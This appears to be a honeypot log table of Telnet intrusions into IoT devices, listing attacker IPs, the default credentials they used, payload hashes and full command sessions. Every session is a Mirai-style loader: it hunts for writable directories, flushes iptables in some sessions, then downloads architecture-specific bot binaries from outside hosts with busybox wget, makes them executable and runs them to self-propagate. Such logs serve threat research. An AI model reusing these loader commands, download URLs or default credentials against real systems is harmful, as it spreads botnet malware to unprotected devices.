| IP address |
User name |
Password |
SHA256 of the payload file |
 103.136.40.101
| guest | 123456 | fd288d3a07f398a18a73a684e4f97f2f73a8188a4b5605d8edbc1e05cdf07a23 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf bb c
/bin/busybox cp /bin/busybox bb; >bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HIITO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HIITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HIITO
/bin/busybox wget http://103.136.40.101:80/swrgiuhguhwrguiwetu/arm -O - > bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
./bb load.wget; /bin/busybox SYLVEONSARECUTE
/bin/busybox rm -rf c bb
/bin/busybox cp /bin/busybox bb; >bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HIITO
/bin/busybox wget http://103.136.40.101:80/swrgiuhguhwrguiwetu/arm7 -O - > bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
./bb load.wget; /bin/busybox SYLVEONSARECUTE
/bin/busybox rm -rf c; >bb; /bin/busybox HIITO |
45.95.168.242 | root | 88888888 | 3d21e95863948994e60c78b966f56a0cce1e9d77ff1d8ac9afde755b0d115561 |
iptables -F
development
linuxshell
system
enable
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .fatality000 s1ker1m
/bin/busybox cp /bin/busybox .fatality000; >.fatality000; /bin/busybox chmod 777 .fatality000; /bin/busybox LETHERFA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LETHERFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LETHERFA
/bin/busybox wget http://45.95.168.242:80/dlrdlrdlrdlr00001/d4mnasdasd4mn.mpsl -O - > .fatality000; /bin/busybox chmod 777 .fatality000; /bin/busybox LETHERFA
./.fatality000 selfrep.mpsl; /bin/busybox ELBATSNU
/bin/busybox rm -rf s1ker1m; >.fatality000; /bin/busybox LETHERFA |
 81.19.215.118
| e8ehome | e8ehome | f6e94adf7cd7675fbcfc873843e79657728c0e17ff04e4e79e3560aacb6d77fd |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .x6tr sikerim
/bin/busybox cp /bin/busybox .x6tr; >.x6tr; /bin/busybox chmod 777 .x6tr; /bin/busybox LETHERFA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LETHERFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LETHERFA
/bin/busybox wget http://81.19.215.118:80/919100h/nomn0m.spc -O - > .x6tr; /bin/busybox chmod 777 .x6tr; /bin/busybox LETHERFA
./.x6tr selfrep.spc; /bin/busybox ELBATSNU
/bin/busybox rm -rf sikerim; >.x6tr; /bin/busybox LETHERFA |
 188.213.165.43
| daemon | | f5d6c5a849aa030e5c51038cf874674e7044386a739130038fe3e15c0f7576c8 |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:5056
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://188.213.165.43:80/hakka/helios.spc -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi spc; /bin/busybox AFES
/bin/busybox SEFA |
188.213.165.43 | root | 7ujMko0admin | 689c7fd56321226bde498b1cbe80149e40afa2a1a62221fa73e30c1fb3102261 |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:0265
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://188.213.165.43:80/hakka/helios.mpsl -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi mpsl; /bin/busybox AFES
/bin/busybox SEFA |
103.136.40.101 | root | 123123 | 7b752c7760daf432e11597b01770bce47eaea871c56fb560ab3f03a9ad5d2f7e |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf bb c
/bin/busybox cp /bin/busybox bb; >bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HIITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HIITO
/bin/busybox wget http://103.136.40.101:80/swrgiuhguhwrguiwetu/ppc -O - > bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
./bb load.wget; /bin/busybox SYLVEONSARECUTE
/bin/busybox rm -rf c; >bb; /bin/busybox HIITO |
45.95.168.242 | root | password | 7e18c2134e9e5b1ac50003744779da9b9c1fd99c7534b26863c62bdce51c901c |
iptables -F
development
linuxshell
system
enable
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .fatality000 s1ker1m
/bin/busybox cp /bin/busybox .fatality000; >.fatality000; /bin/busybox chmod 777 .fatality000; /bin/busybox LETHERFA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LETHERFA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox LETHERFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LETHERFA
/bin/busybox wget http://45.95.168.242:80/dlrdlrdlrdlr00001/d4mnasdasd4mn.arm -O - > .fatality000; /bin/busybox chmod 777 .fatality000; /bin/busybox LETHERFA
./.fatality000 selfrep.arm; /bin/busybox ELBATSNU
/bin/busybox rm -rf s1ker1m .fatality000
/bin/busybox cp /bin/busybox .fatality000; >.fatality000; /bin/busybox chmod 777 .fatality000; /bin/busybox LETHERFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LETHERFA
/bin/busybox wget http://45.95.168.242:80/dlrdlrdlrdlr00001/d4mnasdasd4mn.arm7 -O - > .fatality000; /bin/busybox chmod 777 .fatality000; /bin/busybox LETHERFA
./.fatality000 selfrep.arm7; /bin/busybox ELBATSNU
/bin/busybox rm -rf s1ker1m; >.fatality000; /bin/busybox LETHERFA |
103.136.40.101 | default | default | e2a64f3888a9e07d9ba463b18df77f2295f6bcd55ef5554429a386d923d00345 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf bb c
/bin/busybox cp /bin/busybox bb; >bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HIITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HIITO
/bin/busybox wget http://103.136.40.101:80/swrgiuhguhwrguiwetu/sh4 -O - > bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
./bb load.wget; /bin/busybox SYLVEONSARECUTE
/bin/busybox rm -rf c; >bb; /bin/busybox HIITO |